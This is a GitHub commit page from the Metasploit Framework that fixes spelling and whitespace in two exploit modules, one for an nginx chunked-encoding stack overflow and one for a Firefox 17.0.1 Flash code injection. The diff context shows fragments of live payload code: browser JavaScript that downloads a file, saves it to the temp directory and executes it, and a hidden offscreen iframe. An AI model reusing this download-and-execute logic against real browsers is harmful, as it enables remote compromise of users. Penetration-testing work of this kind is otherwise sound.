Skip to content

Commit 75d6c80

Browse files
author
Tod Beardsley
committed
Spelling, whitespace
Please be sure to run msftidy.rb on new modules. Thanks!
1 parent e169cca commit 75d6c80

File tree

2 files changed

+7
-7
lines changed

2 files changed

+7
-7
lines changed

modules/exploits/linux/http/nginx_chunked_size.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@ class Metasploit4 < Msf::Exploit::Remote
1414
def initialize(info = {})
1515

1616
super(update_info(info,
17-
'Name' => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow',
17+
'Name' => 'Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow',
1818
'Description' => %q{
1919
This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx.
2020
The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by

modules/exploits/multi/browser/firefox_svg_plugin.rb

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
1515

1616
def initialize(info = {})
1717
super(update_info(info,
18-
'Name' => 'Firefox 17.0.1 + Flash Privileged Code Injection',
18+
'Name' => 'Firefox 17.0.1 Flash Privileged Code Injection',
1919
'Description' => %q{
2020
This exploit gains remote code execution on Firefox 17.0.1 and all previous
2121
versions, provided the user has installed Flash. No memory corruption is used.
@@ -180,11 +180,11 @@ def js_payload(target)
180180
x.send(null);
181181
#{js_debug("'Payload: '+x.responseText", "")}
182182
var file = Components.classes["@mozilla.org/file/directory_service;1"]
183-
.getService(Components.interfaces.nsIProperties)
184-
.get("TmpD", Components.interfaces.nsIFile);
183+
.getService(Components.interfaces.nsIProperties)
184+
.get("TmpD", Components.interfaces.nsIFile);
185185
file.append('#{payload_filename(target)}');
186186
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
187-
.createInstance(Components.interfaces.nsIFileOutputStream);
187+
.createInstance(Components.interfaces.nsIFileOutputStream);
188188
stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0);
189189
stream.write(x.responseText, x.responseText.length);
190190
if (stream instanceof Components.interfaces.nsISafeOutputStream) {
@@ -195,7 +195,7 @@ def js_payload(target)
195195
#{chmod_code(target)}
196196
#{js_debug("'Downloaded to: '+file.path", "")}
197197
var process = Components.classes["@mozilla.org/process/util;1"]
198-
.createInstance(Components.interfaces.nsIProcess);
198+
.createInstance(Components.interfaces.nsIProcess);
199199
process.init(file);
200200
process.run(false, [], 0);
201201
|
@@ -285,7 +285,7 @@ def generate_html(target)
285285
</script>
286286
287287
<iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
288-
name="#{vars[:frame_name]}"></iframe>
288+
name="#{vars[:frame_name]}"></iframe>
289289
#{vars[:content]}
290290
</body>
291291
</html>

0 commit comments

Comments
 (0)